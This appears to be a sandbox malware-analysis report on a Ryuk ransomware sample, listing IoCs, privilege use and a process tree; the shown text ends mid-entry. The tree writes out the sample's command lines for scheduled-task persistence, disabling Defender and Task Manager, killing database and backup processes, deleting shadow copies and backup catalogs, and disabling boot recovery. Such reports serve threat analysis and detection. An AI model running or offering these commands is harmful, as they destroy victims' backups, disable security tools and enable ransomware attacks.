3928	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
3928	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
3928	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
3928	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
3928	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
3928	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
3928	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
3928	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
3928	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
3928	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
3928	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
3928	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
3928	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
3928	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
3928	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
3928	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
3928	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
3928	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
3928	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
3928	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
3928	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
3928	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
3928	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
3928	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
3928	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
3928	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
3928	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
3928	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
3928	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
3928	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
3928	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
3928	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
3928	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
3928	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
3928	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
3928	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
3928	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
3928	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
3928	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	2460	taskkill.exe
Token: SeDebugPrivilege	3364	taskkill.exe
Token: SeIncreaseQuotaPrivilege	3888	WMIC.exe
Token: SeSecurityPrivilege	3888	WMIC.exe
Token: SeTakeOwnershipPrivilege	3888	WMIC.exe
Token: SeLoadDriverPrivilege	3888	WMIC.exe
Token: SeSystemProfilePrivilege	3888	WMIC.exe
Token: SeSystemtimePrivilege	3888	WMIC.exe
Token: SeProfSingleProcessPrivilege	3888	WMIC.exe
Token: SeIncBasePriorityPrivilege	3888	WMIC.exe
Token: SeCreatePagefilePrivilege	3888	WMIC.exe
Token: SeBackupPrivilege	3888	WMIC.exe
Token: SeRestorePrivilege	3888	WMIC.exe
Token: SeShutdownPrivilege	3888	WMIC.exe
Token: SeDebugPrivilege	3888	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3888	WMIC.exe
Token: SeRemoteShutdownPrivilege	3888	WMIC.exe
Token: SeUndockPrivilege	3888	WMIC.exe
Token: SeManageVolumePrivilege	3888	WMIC.exe
Token: 33	3888	WMIC.exe
Token: 34	3888	WMIC.exe
Token: 35	3888	WMIC.exe
Token: 36	3888	WMIC.exe
Token: SeIncreaseQuotaPrivilege	3888	WMIC.exe
Token: SeSecurityPrivilege	3888	WMIC.exe
Token: SeTakeOwnershipPrivilege	3888	WMIC.exe
Token: SeLoadDriverPrivilege	3888	WMIC.exe
Token: SeSystemProfilePrivilege	3888	WMIC.exe
Token: SeSystemtimePrivilege	3888	WMIC.exe
Token: SeProfSingleProcessPrivilege	3888	WMIC.exe
Token: SeIncBasePriorityPrivilege	3888	WMIC.exe
Token: SeCreatePagefilePrivilege	3888	WMIC.exe
Token: SeBackupPrivilege	3888	WMIC.exe
Token: SeRestorePrivilege	3888	WMIC.exe
Token: SeShutdownPrivilege	3888	WMIC.exe
Token: SeDebugPrivilege	3888	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3888	WMIC.exe
Token: SeRemoteShutdownPrivilege	3888	WMIC.exe
Token: SeUndockPrivilege	3888	WMIC.exe
Token: SeManageVolumePrivilege	3888	WMIC.exe
Token: 33	3888	WMIC.exe
Token: 34	3888	WMIC.exe
Token: 35	3888	WMIC.exe
Token: 36	3888	WMIC.exe
Token: SeBackupPrivilege	1980	vssvc.exe
Token: SeRestorePrivilege	1980	vssvc.exe
Token: SeAuditPrivilege	1980	vssvc.exe
Token: SeDebugPrivilege	1600	taskkill.exe
Token: SeDebugPrivilege	1324	taskkill.exe
Token: SeDebugPrivilege	4708	taskkill.exe
Token: SeSecurityPrivilege	3384	wevtutil.exe
Token: SeBackupPrivilege	3384	wevtutil.exe
Token: SeSecurityPrivilege	1992	wevtutil.exe
Token: SeBackupPrivilege	1992	wevtutil.exe
Token: SeSecurityPrivilege	2012	wevtutil.exe
Token: SeBackupPrivilege	2012	wevtutil.exe
Token: SeSecurityPrivilege	1788	wevtutil.exe
Token: SeBackupPrivilege	1788	wevtutil.exe
Token: SeSecurityPrivilege	4448	wevtutil.exe
Token: SeBackupPrivilege	4448	wevtutil.exe
Token: SeSecurityPrivilege	4972	wevtutil.exe
Token: SeBackupPrivilege	4972	wevtutil.exe
Token: SeSecurityPrivilege	4120	wevtutil.exe
Token: SeBackupPrivilege	4120	wevtutil.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3928 wrote to memory of 2840	3928	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe	88
PID 3928 wrote to memory of 2840	3928	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe	88
PID 2840 wrote to memory of 4932	2840	cmd.exe	89
PID 2840 wrote to memory of 4932	2840	cmd.exe	89
PID 3928 wrote to memory of 4648	3928	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe	90
PID 3928 wrote to memory of 4648	3928	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe	90
PID 3928 wrote to memory of 444	3928	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe	91
PID 3928 wrote to memory of 444	3928	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe	91
PID 3928 wrote to memory of 1288	3928	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe	92
PID 3928 wrote to memory of 1288	3928	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe	92
PID 1288 wrote to memory of 612	1288	cmd.exe	93
PID 1288 wrote to memory of 612	1288	cmd.exe	93
PID 3928 wrote to memory of 2480	3928	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe	94
PID 3928 wrote to memory of 2480	3928	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe	94
PID 2480 wrote to memory of 4364	2480	cmd.exe	95
PID 2480 wrote to memory of 4364	2480	cmd.exe	95
PID 3928 wrote to memory of 1520	3928	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe	96
PID 3928 wrote to memory of 1520	3928	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe	96
PID 1520 wrote to memory of 1300	1520	cmd.exe	97
PID 1520 wrote to memory of 1300	1520	cmd.exe	97
PID 3928 wrote to memory of 740	3928	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe	98
PID 3928 wrote to memory of 740	3928	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe	98
PID 740 wrote to memory of 4836	740	cmd.exe	99
PID 740 wrote to memory of 4836	740	cmd.exe	99
PID 3928 wrote to memory of 4124	3928	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe	100
PID 3928 wrote to memory of 4124	3928	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe	100
PID 4124 wrote to memory of 3200	4124	cmd.exe	101
PID 4124 wrote to memory of 3200	4124	cmd.exe	101
PID 3928 wrote to memory of 1424	3928	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe	102
PID 3928 wrote to memory of 1424	3928	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe	102
PID 1424 wrote to memory of 2284	1424	cmd.exe	103
PID 1424 wrote to memory of 2284	1424	cmd.exe	103
PID 3928 wrote to memory of 2324	3928	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe	104
PID 3928 wrote to memory of 2324	3928	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe	104
PID 2324 wrote to memory of 4672	2324	cmd.exe	105
PID 2324 wrote to memory of 4672	2324	cmd.exe	105
PID 3928 wrote to memory of 2440	3928	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe	107
PID 3928 wrote to memory of 2440	3928	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe	107
PID 3928 wrote to memory of 2176	3928	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe	108
PID 3928 wrote to memory of 2176	3928	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe	108
PID 2176 wrote to memory of 2588	2176	cmd.exe	109
PID 2176 wrote to memory of 2588	2176	cmd.exe	109
PID 2440 wrote to memory of 1128	2440	cmd.exe	111
PID 2440 wrote to memory of 1128	2440	cmd.exe	111
PID 2176 wrote to memory of 2460	2176	cmd.exe	110
PID 2176 wrote to memory of 2460	2176	cmd.exe	110
PID 4672 wrote to memory of 2888	4672	cmd.exe	113
PID 4672 wrote to memory of 2888	4672	cmd.exe	113
PID 3928 wrote to memory of 4468	3928	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe	114
PID 3928 wrote to memory of 4468	3928	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe	114
PID 3928 wrote to memory of 2384	3928	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe	115
PID 3928 wrote to memory of 2384	3928	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe	115
PID 3928 wrote to memory of 4844	3928	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe	116
PID 3928 wrote to memory of 4844	3928	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe	116
PID 2588 wrote to memory of 3364	2588	cmd.exe	117
PID 2588 wrote to memory of 3364	2588	cmd.exe	117
PID 3928 wrote to memory of 4400	3928	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe	118
PID 3928 wrote to memory of 4400	3928	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe	118
PID 3928 wrote to memory of 2660	3928	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe	119
PID 3928 wrote to memory of 2660	3928	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe	119
PID 3928 wrote to memory of 1904	3928	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe	120
PID 3928 wrote to memory of 1904	3928	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe	120
PID 1904 wrote to memory of 2040	1904	cmd.exe	121
PID 1904 wrote to memory of 2040	1904	cmd.exe	121

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

Views/modifies file attributes 1 TTPs 5 IoCs

evasion

Hidden Files and Directories

T1158

pid	Process
2284	attrib.exe
2980	attrib.exe
3756	attrib.exe
4364	attrib.exe
3200	attrib.exe

C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
"C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe"
1⤵
- Enumerates connected drives
- Drops file in Program Files directory
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3928
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN RYUK /TR C:\ProgramData\ryuk.exe /RU SYSTEM /RL HIGHEST /F
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2840
- - C:\Windows\system32\schtasks.exe
    schtasks /CREATE /SC ONLOGON /TN RYUK /TR C:\ProgramData\ryuk.exe /RU SYSTEM /RL HIGHEST /F
    3⤵
    - Creates scheduled task(s)
    PID:4932
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c copy C:\ProgramData\ryuk.exe "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe"
  2⤵
  - Drops startup file
  PID:4648
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c copy C:\ProgramData\ryuk.exe "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe"
  2⤵
  PID:444
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN RYUK /TR C:\ProgramData\ryuk.exe /F
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1288
- - C:\Windows\system32\schtasks.exe
    schtasks /CREATE /SC ONLOGON /TN RYUK /TR C:\ProgramData\ryuk.exe /F
    3⤵
    - Creates scheduled task(s)
    PID:612
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c attrib +h +s "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2480
- - C:\Windows\system32\attrib.exe
    attrib +h +s "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe"
    3⤵
    - Drops startup file
    - Views/modifies file attributes
    PID:4364
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN ryk /TR "C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe" /RU SYSTEM /RL HIGHEST /F
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1520
- - C:\Windows\system32\schtasks.exe
    schtasks /CREATE /SC ONLOGON /TN ryk /TR "C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe" /RU SYSTEM /RL HIGHEST /F
    3⤵
    - Creates scheduled task(s)
    PID:1300
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN RyuK /TR "C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe" /F
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:740
- - C:\Windows\system32\schtasks.exe
    schtasks /CREATE /SC ONLOGON /TN RyuK /TR "C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe" /F
    3⤵
    - Creates scheduled task(s)
    PID:4836
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c attrib +h +s ryuk.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4124
- - C:\Windows\system32\attrib.exe
    attrib +h +s ryuk.exe
    3⤵
    - Views/modifies file attributes
    PID:3200
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c attrib +h +s C:\ProgramData\ryuk.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1424
- - C:\Windows\system32\attrib.exe
    attrib +h +s C:\ProgramData\ryuk.exe
    3⤵
    - Views/modifies file attributes
    PID:2284
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c start cmd.exe /c icacls * /grant Everyone:(OI)(CI)F /T /C /Q
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2324
- - C:\Windows\system32\cmd.exe
    cmd.exe /c icacls * /grant Everyone:(OI)(CI)F /T /C /Q
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4672
  - - C:\Windows\system32\icacls.exe
      icacls * /grant Everyone:(OI)(CI)F /T /C /Q
      4⤵
      Modifies file permissions
      PID:2888
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2440
- - C:\Windows\system32\reg.exe
    reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f
    3⤵
    PID:1128
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c start cmd.exe /c taskkill /t /f /im sql* && taskkill /f /t /im veeam* && taskkill /F /T /IM MSExchange* && taskkill /F /T /IM Microsoft.Exchange* && taskkill /F /T /IM pvx* && taskkill /F /T /IM dbsrv* && exit
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2176
- - C:\Windows\system32\cmd.exe
    cmd.exe /c taskkill /t /f /im sql*
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2588
  - - C:\Windows\system32\taskkill.exe
      taskkill /t /f /im sql*
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:3364
- - C:\Windows\system32\taskkill.exe
    taskkill /f /t /im veeam*
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2460
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c Copy hrmlog1 C:\ProgramData\hrmlog1
  2⤵
  PID:4468
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c Copy hrmlog2 C:\ProgramData\hrmlog2
  2⤵
  PID:2384
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c Copy RYUKID C:\ProgramData\RYUKID
  2⤵
  PID:4844
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c Copy C:\ProgramData\hrmlog1 %userprofile%\Desktop\hrmlog1
  2⤵
  PID:4400
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c Copy "C:\ProgramData\RyukReadMe.txt " "%userprofile%\Desktop\RyukReadMe.txt "
  2⤵
  PID:2660
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1904
- - C:\Windows\system32\reg.exe
    reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
    3⤵
    PID:2040
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
  2⤵
  PID:4592
- - C:\Windows\system32\reg.exe
    reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
    3⤵
    PID:3532
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg delete HKEY_CURRENT_USER\System\CurrentControlSet\Control\SafeBoot /va /F
  2⤵
  PID:3720
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg delete HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SafeBoot /va /F
  2⤵
  PID:3348
- - C:\Windows\system32\reg.exe
    reg delete HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SafeBoot /va /F
    3⤵
    PID:1724
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c start cmd.exe /c "C:\ProgramData\RyukReadMe.txt " && exit
  2⤵
  PID:4000
- - C:\Windows\system32\cmd.exe
    cmd.exe /c "C:\ProgramData\RyukReadMe.txt "
    3⤵
    - Checks computer location settings
    - Modifies registry class
    PID:1068
  - - C:\Windows\system32\NOTEPAD.EXE
      "C:\Windows\system32\NOTEPAD.EXE" C:\ProgramData\RyukReadMe.txt
      4⤵
      Opens file in notepad (likely ransom note)
      PID:4880
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c start cmd.exe /c vssadmin Delete Shadows /All /Quiet
  2⤵
  PID:5112
- - C:\Windows\system32\cmd.exe
    cmd.exe /c vssadmin Delete Shadows /All /Quiet
    3⤵
    PID:5116
  - - C:\Windows\system32\vssadmin.exe
      vssadmin Delete Shadows /All /Quiet
      4⤵
      Interacts with shadow copies
      PID:2244
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c start cmd.exe /c wmic shadowcopy delete
  2⤵
  PID:3332
- - C:\Windows\system32\cmd.exe
    cmd.exe /c wmic shadowcopy delete
    3⤵
    PID:2132
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic shadowcopy delete
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:3888
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c start cmd.exe /c bcdedit /set {default} boostatuspolicy ignoreallfailures
  2⤵
  PID:3412
- - C:\Windows\system32\cmd.exe
    cmd.exe /c bcdedit /set {default} boostatuspolicy ignoreallfailures
    3⤵
    PID:2012
  - - C:\Windows\system32\bcdedit.exe
      bcdedit /set {default} boostatuspolicy ignoreallfailures
      4⤵
      Modifies boot configuration data using bcdedit
      PID:1748
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c start cmd.exe /c bcdedit /set {default} recoveryenabled no
  2⤵
  PID:4596
- - C:\Windows\system32\cmd.exe
    cmd.exe /c bcdedit /set {default} recoveryenabled no
    3⤵
    PID:1928
  - - C:\Windows\system32\bcdedit.exe
      bcdedit /set {default} recoveryenabled no
      4⤵
      Modifies boot configuration data using bcdedit
      PID:4340
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c start cmd.exe /c wbadmin delete catalog -quiet/
  2⤵
  PID:2560
- - C:\Windows\system32\cmd.exe
    cmd.exe /c wbadmin delete catalog -quiet/
    3⤵
    PID:1724
  - - C:\Windows\system32\wbadmin.exe
      wbadmin delete catalog -quiet/
      4⤵
      Deletes backup catalog
      Drops file in Windows directory
      PID:4764
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop avpsus /y
  2⤵
  PID:2588
- - C:\Windows\system32\net.exe
    net stop avpsus /y
    3⤵
    PID:4700
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop avpsus /y
      4⤵
      PID:3268
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop McAfeeDLPAgentService /y
  2⤵
  PID:3368
- - C:\Windows\system32\net.exe
    net stop McAfeeDLPAgentService /y
    3⤵
    PID:3212
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop McAfeeDLPAgentService /y
      4⤵
      PID:1300
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop mfewc /y
  2⤵
  PID:2208
- - C:\Windows\system32\net.exe
    net stop mfewc /y
    3⤵
    PID:4660
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop mfewc /y
      4⤵
      PID:2284
  - - C:\Windows\system32\reg.exe
      reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSearchProgramsInStartMenu /t REG_DWORD /d 1 /f
      4⤵
      PID:628
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop BMR Boot Service /y
  2⤵
  PID:4316
- - C:\Windows\system32\net.exe
    net stop BMR Boot Service /y
    3⤵
    PID:2832
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop BMR Boot Service /y
      4⤵
      PID:4456
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop NetBackup BMR MTFTP Service /y
  2⤵
  PID:3260
- - C:\Windows\system32\net.exe
    net stop NetBackup BMR MTFTP Service /y
    3⤵
    PID:2024
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop NetBackup BMR MTFTP Service /y
      4⤵
      PID:1392
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c sc config SQLTELEMETRY start=disabled
  2⤵
  PID:3816
- - C:\Windows\system32\sc.exe
    sc config SQLTELEMETRY start=disabled
    3⤵
    - Launches sc.exe
    PID:4548
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c sc config SQLTELEMETRY$ECWDB2 start= disabled
  2⤵
  PID:5008
- - C:\Windows\system32\sc.exe
    sc config SQLTELEMETRY$ECWDB2 start= disabled
    3⤵
    - Launches sc.exe
    PID:2300
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c sc config SQLWriter start= disabled
  2⤵
  PID:3920
- - C:\Windows\system32\sc.exe
    sc config SQLWriter start= disabled
    3⤵
    - Launches sc.exe
    PID:2524
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c sc config SstpSvc start= disabled
  2⤵
  PID:3896
- - C:\Windows\system32\sc.exe
    sc config SstpSvc start= disabled
    3⤵
    - Launches sc.exe
    PID:4076
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /IM mspub.exe /F
  2⤵
  PID:4952
- - C:\Windows\system32\taskkill.exe
    taskkill /IM mspub.exe /F
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1600
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /IM mydesktopqos.exe /F
  2⤵
  PID:4132
- - C:\Windows\system32\taskkill.exe
    taskkill /IM mydesktopqos.exe /F
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1324
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /IM mydesktopservice.exe /F
  2⤵
  PID:2116
- - C:\Windows\system32\taskkill.exe
    taskkill /IM mydesktopservice.exe /F
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:4708
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c vssadmin Delete Shadows /all /quiet
  2⤵
  PID:1584
- - C:\Windows\system32\vssadmin.exe
    vssadmin Delete Shadows /all /quiet
    3⤵
    - Interacts with shadow copies
    PID:2748
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=c: /on=c: /maxsize=401MB
  2⤵
  PID:1708
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=c: /on=c: /maxsize=401MB
    3⤵
    - Interacts with shadow copies
    PID:2328
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded
  2⤵
  PID:1960
- - C:\Windows\system32\vssadmin.exe
